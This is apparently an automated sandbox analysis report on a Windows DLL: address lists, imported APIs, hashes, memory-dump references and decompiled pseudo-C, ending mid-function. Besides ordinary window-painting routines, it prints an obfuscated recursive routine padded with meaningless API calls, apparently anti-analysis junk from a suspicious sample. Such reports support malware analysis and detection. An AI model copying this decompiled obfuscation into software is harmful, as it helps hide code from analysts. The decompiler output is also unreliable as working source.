0x6e7d9ed2
0x6e7d9edd
0x6e7d9ee0
0x6e7d9ee6
0x6e7d9eeb
0x6e7d9eee
0x6e7d9ef0
0x6e7d9efb
0x6e7d9f00
0x6e7d9f01
0x6e7d9f03
0x6e7d9f05
0x6e7d9f07
0x6e7d9f09
0x6e7d9f0b
0x6e7d9f0e
0x6e7d9f10
0x6e7d9f10
0x6e7d9f16
0x6e7d9f19
0x6e7d9f1b
0x6e7d9f1e
0x6e7d9f23
0x6e7d9f26
0x6e7d9f26
0x6e7d9f2d
0x6e7d9f30
0x6e7d9f35
0x6e7d9f35
0x6e7d9f05
0x6e7d9f38
0x6e7d9f38
0x6e7d9ef0
0x6e7d9d9a
0x6e7d9d9d
0x6e7d9da9
0x6e7d9dab
0x6e7d9dad
0x6e7d9db3
0x6e7d9db3
0x6e7d9daf
0x6e7d9daf
0x6e7d9daf
0x6e7d9dbb
0x6e7d9dc6
0x6e7d9dc9
0x6e7d9dcf
0x6e7d9dd4
0x6e7d9dd7
0x6e7d9dd9
0x6e7d9de4
0x6e7d9de9
0x6e7d9dea
0x6e7d9dec
0x6e7d9dee
0x6e7d9df0
0x6e7d9df2
0x6e7d9df4
0x6e7d9df7
0x6e7d9df9
0x6e7d9df9
0x6e7d9dff
0x6e7d9e02
0x6e7d9e04
0x6e7d9e07
0x6e7d9e0c
0x6e7d9e0f
0x6e7d9e0f
0x6e7d9e16
0x6e7d9e19
0x6e7d9e1e
0x6e7d9e1e
0x6e7d9dee
0x6e7d9e21
0x6e7d9e21
0x6e7d9dd9
0x6e7d9c74
0x6e7d9c77
0x6e7d9c7e
0x6e7d9c83
0x6e7d9c87
0x6e7d9c89
0x6e7d9c8b
0x6e7d9c91
0x6e7d9c91
0x6e7d9c8d
0x6e7d9c8d
0x6e7d9c8d
0x6e7d9c93
0x6e7d9c95
0x6e7d9c95
0x6e7d9ca0
0x6e7d9ca0
0x6e7d9ca3
0x6e7d9ca6
0x6e7d9ca6
0x6e7d9caf
0x6e7d9cb7
0x6e7d9cbc
0x6e7d9cc2
0x6e7d9cc4
0x6e7d9ccd
0x6e7d9cd2
0x6e7d9cd3
0x6e7d9cd5
0x6e7d9cd7
0x6e7d9cd9
0x6e7d9cdb
0x6e7d9cdd
0x6e7d9ce0
0x6e7d9ce2
0x6e7d9ce2
0x6e7d9ce8
0x6e7d9ceb
0x6e7d9ced
0x6e7d9cf0
0x6e7d9cf5
0x6e7d9cf8
0x6e7d9cf8
0x6e7d9cff
0x6e7d9d02
0x6e7d9d07
0x6e7d9d07
0x6e7d9cd7
0x6e7d9d0a
0x6e7d9d0a
0x6e7d9cc4
0x6e7da159
0x6e7da15d
0x6e7da163
0x6e7da166
0x6e7da168
0x6e7da16d
0x6e7da172
0x6e7da173
0x6e7da175
0x6e7da177
0x6e7da179
0x6e7da17c
0x6e7da17e
0x6e7da17e
0x6e7da184
0x6e7da187
0x6e7da189
0x6e7da18c
0x6e7da191
0x6e7da194
0x6e7da194
0x6e7da19b
0x6e7da19e
0x6e7da1a3
0x6e7da1a3
0x6e7da173
0x6e7da1a6
0x6e7da1ad
0x6e7da1b5
0x6e7da1b6
0x6e7da1bc
0x6e7da1bf
0x00000000
0x6e7da1c1
0x6e7da1c1
0x00000000
0x6e7da1c1
0x6e7da1bf
0x6e7d9be9
0x6e7d9bb0
0x6e7d9b9b
0x6e7d9b90
0x6e7d9b7e
0x00000000
0x6e7d9b68
0x00000000
0x6e7d9b30
0x6e7d9b26
0x6e7d9b08
0x6e7d9af6
0x6e7d9aeb
0x6e7d9a4c
0x6e7d9a4c
0x00000000
0x6e7d9a4c
0x6e7d9a4a
0x6e7d9a3a
0x6e7d99f4
0x6e7d99f4
0x00000000
0x6e7d99f4
0x6e7d99f2
0x6e7d99e2
0x00000000
0x00000000
0x00000000
0x6e7d98a3
0x6e7d9893
0x6e7d987f
0x6e7d97b4
0x6e7d978f
0x6e7d9787
0x6e7d976c
0x00000000
0x6e7d973f
0x00000000
0x6e7d9720
0x6e7d970f
0x6e7d9326
0x6e7d932e
0x6e7d9332
0x6e7d9338
0x6e7d933b
0x6e7d9340
0x6e7d9343
0x6e7d9348
0x6e7d934d
0x6e7d9353
0x6e7d9359
0x6e7d935d
0x6e7d9360
0x6e7d9362
0x6e7d9362
0x6e7d9368
0x6e7d936d
0x6e7d9370
0x6e7d9375
0x6e7d9378
0x6e7d9378
0x6e7d937f
0x6e7d9382
0x6e7d9387
0x6e7d938a
0x6e7d938a
0x6e7d938d
0x6e7d938d
0x6e7d9396
0x6e7d939f
0x6e7d93a0
0x6e7d93a3
0x6e7d93a8
0x6e7d93ac
0x6e7d93b0
0x6e7d93c5
0x6e7d93c5
0x6e7d93b2
0x6e7d93b2
0x6e7d93b7
0x6e7d93c0
0x6e7d93c0
0x6e7d93b7
0x6e7d93c8
0x6e7d93d0
0x6e7d93d3
0x6e7d93d6
0x6e7d93da
0x6e7d93df
0x6e7d93e5
0x6e7d93eb
0x6e7d93ef
0x6e7d93f2
0x6e7d93f4
0x6e7d93f4
0x6e7d93fa
0x6e7d93ff
0x6e7d9402
0x6e7d9407
0x6e7d940a
0x6e7d940a
0x6e7d9411
0x6e7d9414
0x6e7d9419
0x6e7d9419
0x6e7d941c
0x6e7d941c
0x6e7d93da
0x6e7d9423
0x6e7d9427
0x6e7d942d
0x6e7d9432
0x6e7d9437
0x6e7d943d
0x6e7d943f
0x6e7d9443
0x6e7d9446
0x6e7d9448
0x6e7d9448
0x6e7d944e
0x6e7d9453
0x6e7d9456
0x6e7d945b
0x6e7d945e
0x6e7d945e
0x6e7d9465
0x6e7d9468
0x6e7d946d
0x6e7d946d
0x6e7d943d
0x6e7d9470
0x6e7d9477
0x6e7d947c
0x6e7d947d
0x6e7d9483
0x00000000
0x6e7d9485
0x6e7d9485
0x00000000
0x6e7d9485
0x6e7d9483
0x6e7d9320
0x6e7d92ea
0x6e7d92d8
0x6e7d92cd
0x6e7d92bb
0x00000000
0x6e7d92a5
0x00000000
0x6e7d9270
0x6e7d926a
0x6e7d924f
0x6e7d923d
0x6e7d9232
0x00000000

APIs

VariantInit.OLEAUT32(?), ref: 6E7D930A
VariantCopy.OLEAUT32(?,?), ref: 6E7D9318
SysFreeString.OLEAUT32(00000000), ref: 6E7D9360
SysFreeString.OLEAUT32(-00000001), ref: 6E7D93F2
VariantClear.OLEAUT32(?), ref: 6E7D9427
SysFreeString.OLEAUT32(-00000001), ref: 6E7D9446
SysFreeString.OLEAUT32(00000000), ref: 6E7D9477
SysFreeString.OLEAUT32(00000000), ref: 6E7D9490
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E7D9514
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E7D951E
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E7D953B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E7D9558
SysFreeString.OLEAUT32(00000000), ref: 6E7D9567
SysFreeString.OLEAUT32(00000000), ref: 6E7D95EB
SysFreeString.OLEAUT32(00000000), ref: 6E7D962F
_com_issue_error.COMSUPP ref: 6E7D9671
_com_issue_error.COMSUPP ref: 6E7D967B
_com_issue_error.COMSUPP ref: 6E7D9681
_com_issue_error.COMSUPP ref: 6E7D968B
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E7D9691

Strings

lines, xrefs: 6E7D950B, 6E7D9532
offsetY, xrefs: 6E7D9326
!, xrefs: 6E7D963A

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: 548d7bb5730366af8bfd7bdfaab3a1c6942183e297dc4e24f65d37c0b5700fb7
Instruction ID: e86cdd98e1af2e988fcf56a73fa7733b4404b19ed962227aee7206c5cce496cc
Opcode Fuzzy Hash: 548d7bb5730366af8bfd7bdfaab3a1c6942183e297dc4e24f65d37c0b5700fb7
Instruction Fuzzy Hash: F6F18F70A0064A9FEF01DFE4CA68BEEBBB8AF15704F104568E415FB2A4D775D909CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1A20, Relevance: 31.7, APIs: 21, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E7E1A20(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v12;
				struct tagPOINT _v68;
				struct tagPOINT _v84;
				intOrPtr _v88;
				int _v92;
				struct tagPAINTSTRUCT _v104;
				struct tagRECT _v120;
				intOrPtr _v124;
				signed int _v132;
				void* _v140;
				signed int _v144;
				void* _v152;
				void* _v164;
				int _v168;
				struct HWND__* _v172;
				struct HWND__* _v188;
				struct tagPAINTSTRUCT _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				intOrPtr _t64;
				signed int _t71;
				struct HWND__* _t77;
				void* _t80;
				signed int _t91;
				signed int _t117;
				intOrPtr _t129;
				intOrPtr _t132;
				signed int _t137;
				int _t138;
				struct HDC__* _t140;
				signed int _t145;
				signed int _t148;
				signed int _t149;
				void* _t154;

				_t130 = __edi;
				_t112 = __ebx;
				_t135 = __ecx;
				_t64 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t64 == 0) {
					L5:
					E6E7E2460(_t112, _t135 + 4, _t130);
					_push(0x28);
					return E6E7E441B( *((intOrPtr*)(_t135 + 4)));
				} else {
					_t117 =  *((intOrPtr*)(__ecx + 0x14)) - _t64 & 0xfffffffc;
					if(_t117 < 0x1000) {
						L4:
						_push(_t117);
						E6E7E441B(_t64);
						 *(_t135 + 0xc) = 0;
						_t145 = _t145 + 8;
						 *(_t135 + 0x10) = 0;
						 *(_t135 + 0x14) = 0;
						goto L5;
					} else {
						_t129 =  *((intOrPtr*)(_t64 - 4));
						_t117 = _t117 + 0x23;
						if(_t64 - _t129 + 0xfffffffc > 0x1f) {
							E6E7EE5E6(__ebx, _t117, _t129, __edi, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t148 = (_t145 & 0xfffffff0) - 0x88;
							_t71 =  *0x6e81e008; // 0x77dcee0d
							_v12 = _t71 ^ _t148;
							_push(__ecx);
							_push(__edi);
							_t137 = _t117;
							_v144 = _t137;
							E6E7E8BE0(__edi,  &_v104, 0, 0x40);
							_t149 = _t148 + 0xc;
							asm("xorps xmm0, xmm0");
							asm("movaps [esp+0x20], xmm0");
							BeginPaint( *(_t137 + 0x18),  &_v104);
							_t77 = GetParent( *(_t137 + 0x18));
							_v140 = _t77;
							GetClientRect(_t77,  &_v120);
							_t138 = CreateCompatibleDC(_v104);
							_v140 = _t138;
							_t80 = CreateCompatibleBitmap(_v120.bottom, _v120.top - _v124, _v120.right - _v120.left);
							_v140 = _t80;
							_v152 = SelectObject(_t138, _t80);
							_v164 = SelectObject(_t138,  *(_v168 + 0x54));
							SendMessageW(_v172, 0x14, _t138, 0);
							SendMessageW(_v172, 0xf, _v168, 0);
							_t140 = _v168;
							SetBkMode(_t140, 1);
							SetTextColor(_t140, 0xffffff);
							GetClientRect( *(_v224.rgbReserved + 0x18),  &(_v104.fIncUpdate));
							_t132 = _v224.rgbReserved;
							_t91 = ClientToScreen( *(_t132 + 0x18),  &(_v104.fIncUpdate));
							__eflags = _t91;
							if(_t91 != 0) {
								ClientToScreen( *(_t132 + 0x18),  &_v68);
							}
							_v84.x = 0;
							_v104.fRestore = 0;
							ClientToScreen(_v188,  &_v84);
							_v84.x = _v104.fIncUpdate.x - _v84.x;
							_v104.fRestore = _v104.rgbReserved - _v104.fRestore;
							E6E7E1300(_t132, _t132, _t140, _t154, _t140, _v104.fIncUpdate.x - _v84.x, _v104.rgbReserved - _v104.fRestore);
							BitBlt(_v164, 0, 0, _v104.fRestore - _v88, _v104.fIncUpdate.x - _v84.x, _t140, _v104.rcPaint, _v92, 0xcc0020);
							SelectObject(_t140, _v228);
							SelectObject(_t140, _v232);
							DeleteObject(_v236);
							DeleteDC(_t140);
							EndPaint( *(_t132 + 0x18),  &_v224);
							__eflags = _v132 ^ _t149;
							return E6E7E440A(_v132 ^ _t149);
						} else {
							_t64 = _t129;
							goto L4;
						}
					}
				}
			}

0x6e7e1a20
0x6e7e1a20
0x6e7e1a21
0x6e7e1a23
0x6e7e1a28
0x6e7e1a6b
0x6e7e1a6e
0x6e7e1a73
0x6e7e1a81
0x6e7e1a2a
0x6e7e1a2f
0x6e7e1a38
0x6e7e1a4c
0x6e7e1a4c
0x6e7e1a4e
0x6e7e1a53
0x6e7e1a5a
0x6e7e1a5d
0x6e7e1a64
0x00000000
0x6e7e1a3a
0x6e7e1a3a
0x6e7e1a3d
0x6e7e1a48
0x6e7e1a82
0x6e7e1a87
0x6e7e1a88
0x6e7e1a89
0x6e7e1a8a
0x6e7e1a8b
0x6e7e1a8c
0x6e7e1a8d
0x6e7e1a8e
0x6e7e1a8f
0x6e7e1a96
0x6e7e1a9c
0x6e7e1aa3
0x6e7e1aaa
0x6e7e1aab
0x6e7e1ab2
0x6e7e1ab7
0x6e7e1abb
0x6e7e1ac0
0x6e7e1ac7
0x6e7e1aca
0x6e7e1ad3
0x6e7e1adc
0x6e7e1aee
0x6e7e1af2
0x6e7e1b02
0x6e7e1b16
0x6e7e1b1a
0x6e7e1b22
0x6e7e1b30
0x6e7e1b4d
0x6e7e1b51
0x6e7e1b5f
0x6e7e1b61
0x6e7e1b68
0x6e7e1b74
0x6e7e1b86
0x6e7e1b88
0x6e7e1b94
0x6e7e1b9a
0x6e7e1b9c
0x6e7e1ba9
0x6e7e1ba9
0x6e7e1bb3
0x6e7e1bc0
0x6e7e1bcb
0x6e7e1be6
0x6e7e1bed
0x6e7e1bf4
0x6e7e1c2d
0x6e7e1c38
0x6e7e1c43
0x6e7e1c4d
0x6e7e1c54
0x6e7e1c62
0x6e7e1c73
0x6e7e1c7d
0x6e7e1a4a
0x6e7e1a4a
0x00000000
0x6e7e1a4a
0x6e7e1a48
0x6e7e1a38

APIs

BeginPaint.USER32(?,?), ref: 6E7E1AD3
GetParent.USER32(?), ref: 6E7E1ADC
GetClientRect.USER32 ref: 6E7E1AF2
CreateCompatibleDC.GDI32(?), ref: 6E7E1AF8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E7E1B1A
SelectObject.GDI32(00000000,00000000), ref: 6E7E1B26
SelectObject.GDI32(00000000,?), ref: 6E7E1B38
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E7E1B51
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E7E1B5F
SetBkMode.GDI32(?,00000001), ref: 6E7E1B68
SetTextColor.GDI32(?,00FFFFFF), ref: 6E7E1B74
GetClientRect.USER32 ref: 6E7E1B86
ClientToScreen.USER32(?,?), ref: 6E7E1B94
ClientToScreen.USER32(?,?), ref: 6E7E1BA9
ClientToScreen.USER32(?,?), ref: 6E7E1BCB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E7E1C2D
SelectObject.GDI32(?,?), ref: 6E7E1C38
SelectObject.GDI32(?,?), ref: 6E7E1C43
DeleteObject.GDI32(?), ref: 6E7E1C4D
DeleteDC.GDI32(?), ref: 6E7E1C54
EndPaint.USER32(?,?), ref: 6E7E1C62

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 96dc87c2a5a5934464dc57c040b75ae7bb99441c166b8d8b1a1c7a881b5a83ac
Instruction ID: 4f95ff430568dfad620eff2b634d27bf411a0258755bd623186515b372323ac5
Opcode Fuzzy Hash: 96dc87c2a5a5934464dc57c040b75ae7bb99441c166b8d8b1a1c7a881b5a83ac
Instruction Fuzzy Hash: 3A615C71108B05AFDB209F64CD09B6FBBE9FF89700F004A1CF699921A0DB35A905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1A90, Relevance: 31.6, APIs: 21, Instructions: 141
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E7E1A90(intOrPtr __ecx, void* __edi, void* __esi) {
				signed int _v8;
				struct tagPOINT _v64;
				struct tagPOINT _v80;
				intOrPtr _v84;
				int _v88;
				struct tagPAINTSTRUCT _v100;
				struct tagRECT _v116;
				intOrPtr _v120;
				signed int _v128;
				void* _v136;
				intOrPtr _v140;
				void* _v148;
				void* _v160;
				int _v164;
				struct HWND__* _v168;
				struct HWND__* _v184;
				struct tagPAINTSTRUCT _v220;
				void* _v224;
				void* _v228;
				void* _v232;
				signed int _t56;
				struct HWND__* _t62;
				void* _t65;
				intOrPtr _t111;
				intOrPtr _t114;
				int _t115;
				struct HDC__* _t117;
				signed int _t119;
				signed int _t121;
				signed int _t122;
				void* _t125;

				_t121 = (_t119 & 0xfffffff0) - 0x88;
				_t56 =  *0x6e81e008; // 0x77dcee0d
				_v8 = _t56 ^ _t121;
				_push(__edi);
				_t114 = __ecx;
				_v140 = __ecx;
				E6E7E8BE0(__edi,  &_v100, 0, 0x40);
				_t122 = _t121 + 0xc;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x20], xmm0");
				BeginPaint( *(_t114 + 0x18),  &_v100);
				_t62 = GetParent( *(_t114 + 0x18));
				_v136 = _t62;
				GetClientRect(_t62,  &_v116);
				_t115 = CreateCompatibleDC(_v100);
				_v136 = _t115;
				_t65 = CreateCompatibleBitmap(_v116.bottom, _v116.top - _v120, _v116.right - _v116.left);
				_v136 = _t65;
				_v148 = SelectObject(_t115, _t65);
				_v160 = SelectObject(_t115,  *(_v164 + 0x54));
				SendMessageW(_v168, 0x14, _t115, 0);
				SendMessageW(_v168, 0xf, _v164, 0);
				_t117 = _v164;
				SetBkMode(_t117, 1);
				SetTextColor(_t117, 0xffffff);
				GetClientRect( *(_v220.rgbReserved + 0x18),  &(_v100.fIncUpdate));
				_t111 = _v220.rgbReserved;
				if(ClientToScreen( *(_t111 + 0x18),  &(_v100.fIncUpdate)) != 0) {
					ClientToScreen( *(_t111 + 0x18),  &_v64);
				}
				_v80.x = 0;
				_v100.fRestore = 0;
				ClientToScreen(_v184,  &_v80);
				_v80.x = _v100.fIncUpdate.x - _v80.x;
				_v100.fRestore = _v100.rgbReserved - _v100.fRestore;
				E6E7E1300(_t111, _t111, _t117, _t125, _t117, _v100.fIncUpdate.x - _v80.x, _v100.rgbReserved - _v100.fRestore);
				BitBlt(_v160, 0, 0, _v100.fRestore - _v84, _v100.fIncUpdate.x - _v80.x, _t117, _v100.rcPaint, _v88, 0xcc0020);
				SelectObject(_t117, _v224);
				SelectObject(_t117, _v228);
				DeleteObject(_v232);
				DeleteDC(_t117);
				EndPaint( *(_t111 + 0x18),  &_v220);
				return E6E7E440A(_v128 ^ _t122);
			}

0x6e7e1a96
0x6e7e1a9c
0x6e7e1aa3
0x6e7e1aab
0x6e7e1ab2
0x6e7e1ab7
0x6e7e1abb
0x6e7e1ac0
0x6e7e1ac7
0x6e7e1aca
0x6e7e1ad3
0x6e7e1adc
0x6e7e1aee
0x6e7e1af2
0x6e7e1b02
0x6e7e1b16
0x6e7e1b1a
0x6e7e1b22
0x6e7e1b30
0x6e7e1b4d
0x6e7e1b51
0x6e7e1b5f
0x6e7e1b61
0x6e7e1b68
0x6e7e1b74
0x6e7e1b86
0x6e7e1b88
0x6e7e1b9c
0x6e7e1ba9
0x6e7e1ba9
0x6e7e1bb3
0x6e7e1bc0
0x6e7e1bcb
0x6e7e1be6
0x6e7e1bed
0x6e7e1bf4
0x6e7e1c2d
0x6e7e1c38
0x6e7e1c43
0x6e7e1c4d
0x6e7e1c54
0x6e7e1c62
0x6e7e1c7d

APIs

BeginPaint.USER32(?,?), ref: 6E7E1AD3
GetParent.USER32(?), ref: 6E7E1ADC
GetClientRect.USER32 ref: 6E7E1AF2
CreateCompatibleDC.GDI32(?), ref: 6E7E1AF8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E7E1B1A
SelectObject.GDI32(00000000,00000000), ref: 6E7E1B26
SelectObject.GDI32(00000000,?), ref: 6E7E1B38
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E7E1B51
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E7E1B5F
SetBkMode.GDI32(?,00000001), ref: 6E7E1B68
SetTextColor.GDI32(?,00FFFFFF), ref: 6E7E1B74
GetClientRect.USER32 ref: 6E7E1B86
ClientToScreen.USER32(?,?), ref: 6E7E1B94
ClientToScreen.USER32(?,?), ref: 6E7E1BA9
ClientToScreen.USER32(?,?), ref: 6E7E1BCB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E7E1C2D
SelectObject.GDI32(?,?), ref: 6E7E1C38
SelectObject.GDI32(?,?), ref: 6E7E1C43
DeleteObject.GDI32(?), ref: 6E7E1C4D
DeleteDC.GDI32(?), ref: 6E7E1C54
EndPaint.USER32(?,?), ref: 6E7E1C62

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 47080c9bdeddf07454f412469e1aa706c022d1a4841795cd6ea94a498a433cf5
Instruction ID: 1665b87b116844f5c16bab9160d6e60539c4041ee1ce753afde8de62d62a0224
Opcode Fuzzy Hash: 47080c9bdeddf07454f412469e1aa706c022d1a4841795cd6ea94a498a433cf5
Instruction Fuzzy Hash: 74510572109B45AFDB219F64C908F6FBBE9FF89700F00495DF699921A0DB31A905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5990, Relevance: 22.9, APIs: 15, Instructions: 351
threadwindowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E6E7D5990(signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v56;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t27;
				signed int _t29;
				signed int _t33;
				int _t37;
				void* _t39;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t51;
				void* _t52;
				short _t56;
				void* _t58;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;
				signed int _t72;
				signed int _t73;
				signed int _t87;
				signed int _t95;
				signed int _t102;
				intOrPtr _t109;
				signed int _t113;
				void* _t115;
				intOrPtr _t116;
				signed int _t118;
				signed int _t130;

				_t95 = __edx;
				asm("movss xmm1, [0x6e8186a8]");
				_t115 = (_t113 & 0xfffffff8) - 0x4c;
				_t116 = _a8;
				if(_t116 > 0) {
					_t22 = _a4;
				} else {
					if(_t116 < 0) {
						L3:
						asm("movsd xmm2, [0x6e818620]");
						while(1) {
							asm("movd xmm0, ecx");
							asm("cvtdq2ps xmm0, xmm0");
							asm("divss xmm1, xmm0");
							asm("cvtps2pd xmm0, xmm1");
							asm("movd xmm1, ecx");
							asm("cvtdq2ps xmm1, xmm1");
							asm("addsd xmm2, xmm0");
							asm("movss [esp+0x38], xmm1");
							asm("cvtps2pd xmm1, xmm1");
							asm("cvttsd2si eax, xmm2");
							asm("divsd xmm0, xmm1");
							_v32 = _t21;
							asm("movd xmm2, eax");
							asm("cvtdq2pd xmm2, xmm2");
							asm("addsd xmm0, xmm2");
							asm("movsd [esp+0x50], xmm2");
							_t22 = E6E8083AF(_t21);
							_t118 = _t95;
							if(_t118 <= 0 && (_t118 < 0 || _t22 < 0x3e)) {
								GetCurrentThread();
								_t22 = 0xcc;
								_t95 = 0;
							}
							_v56 = 0;
							_t106 = 0x66;
							_t72 = 0x4a;
							if(_t22 != 0x4f) {
								goto L45;
							}
							if(_t95 == 0) {
								do {
									GetCurrentThreadId();
									asm("cdq");
									_v56 = E6E807C80(_t106, _v56, _t72, _t95);
									_v72 = _t95;
									if(_t72 == 0x7d) {
										asm("movss xmm0, [0x6e818578]");
										_t27 = E6E8081CE(_t26);
										asm("cdq");
										asm("adc ecx, 0x0");
										_t29 = E6E807C80(_t27, _t95, _t27 + 9, _t95);
										asm("movsd xmm0, [0x6e818648]");
										_t72 = _t29;
										while(_t72 < 0x27) {
											asm("subsd xmm0, xmm0");
											_t72 = E6E8083AF(_t29);
											_t43 = E6E808500(E6E7D5ED0(_t72, _t95), _t42);
											asm("movaps xmm1, xmm0");
											asm("subsd xmm1, xmm0");
											asm("movsd [esp+0x18], xmm1");
											asm("mulsd xmm1, xmm0");
											asm("movsd [esp+0x28], xmm1");
											_t29 = E6E808500(_t43, _t72);
											asm("movsd xmm1, [esp+0x28]");
											asm("addsd xmm1, xmm0");
											asm("movsd xmm0, [esp+0x18]");
											asm("cvttsd2si ebx, xmm1");
										}
										asm("movsd xmm2, [0x6e8185b8]");
										asm("movsd xmm1, [0x6e8185d0]");
										while(_t72 < 0x32) {
											asm("movaps xmm0, xmm2");
											asm("divsd xmm0, xmm2");
											asm("movaps xmm2, xmm0");
											asm("mulsd xmm1, xmm2");
											asm("movsd [esp+0x48], xmm2");
											asm("movaps xmm0, xmm1");
											asm("movsd [esp+0x40], xmm1");
											asm("movss xmm1, [0x6e8186b8]");
											asm("addsd xmm0, xmm2");
											asm("movss [esp+0x18], xmm1");
											asm("cvttsd2si eax, xmm0");
											asm("movss xmm0, [0x6e8186c0]");
											asm("movss [esp+0x10], xmm0");
											if(_t29 >= 0x23) {
												_t95 = 0;
												_t9 = _t95 + 0x4e; // 0x4e
												E6E808500(_t29, _t9);
												asm("cvtsd2ss xmm0, xmm0");
												asm("movss [esp+0x28], xmm0");
												do {
													_t37 = GetKBCodePage();
													asm("movss xmm1, [esp+0x18]");
													asm("addss xmm1, [esp+0x10]");
													asm("movaps xmm0, xmm1");
													asm("movss [esp+0x10], xmm1");
													asm("subss xmm0, [esp+0x28]");
													asm("movss [esp+0x18], xmm0");
													_t39 = E6E7D5990(0, E6E8081CE(_t37), 0);
													_t115 = _t115 + 8;
													asm("cdq");
													_t29 = E6E808500(_t39, _t39);
													asm("xorps xmm2, xmm2");
													asm("cvtsd2ss xmm2, xmm0");
													asm("movss xmm0, [esp+0x10]");
													asm("divss xmm0, [esp+0x18]");
													asm("movss [esp+0x28], xmm2");
													asm("divss xmm0, xmm2");
													asm("cvttss2si eax, xmm0");
												} while (_t29 >= 0x23);
											}
											if(_t29 <= 0x77) {
												L50:
												goto L50;
											}
											if(_t29 >= 0x1f) {
												asm("movsd xmm0, [0x6e8186e0]");
											} else {
												asm("xorps xmm0, xmm0");
											}
											asm("cvttsd2si eax, xmm0");
											_t72 = _t29;
											if(_t29 > 0x74) {
												_t29 = E6E808500(E6E7D5ED0(0x4b, _t95), _t35);
												asm("movss xmm1, [0x6e818578]");
												asm("cvtsd2ss xmm0, xmm0");
												asm("divss xmm1, xmm0");
												asm("cvttss2si ebx, xmm1");
											}
											asm("movsd xmm1, [esp+0x40]");
											asm("movsd xmm2, [esp+0x48]");
										}
										if(_t72 == 0x7a) {
											asm("movss xmm0, [0x6e8186ac]");
											asm("movss [esp+0x28], xmm0");
											__imp__GetCurrentProcessorNumber();
											_t73 = 0x58;
											_t102 = 0;
											_t10 = _t73 + 4; // 0x5c
											_t109 = _t10;
											while(1) {
												CreateMenu();
												_t87 = E6E7D5990(_t95, _t109, _t102);
												_t115 = _t115 + 8;
												_t33 = _t73 + _t73;
												asm("xorps xmm0, xmm0");
												asm("cdq");
												_t95 = _t33 % _t87;
												_v68 = _t87;
												_t72 = _t33 / _t87;
												asm("movlpd [esp+0x10], xmm0");
												if(_t72 < 4) {
													break;
												}
												_t102 = _v72;
												_t73 = _t87;
												_t109 = _v76;
											}
											while(_t72 != 0x4f) {
												__imp__GetSystemDefaultUILanguage();
												asm("movss xmm0, [esp+0x28]");
												asm("subss xmm0, xmm0");
												asm("cvttss2si ebx, xmm0");
												asm("movss [esp+0x28], xmm0");
											}
											goto L42;
										}
									} else {
										TlsAlloc();
										_t45 = E6E7D5990(_t95, 9, 0);
										_t115 = _t115 + 8;
										_t46 = E6E808500(_t45, 0x10);
										asm("cvtsd2ss xmm0, xmm0");
										asm("addss xmm0, [0x6e818690]");
										_t47 = E6E8081CE(_t46);
										E6E808500(E6E7D5ED0(0x48, 0), _t48);
										asm("cvtsd2ss xmm0, xmm0");
										asm("cvttss2si ecx, xmm0");
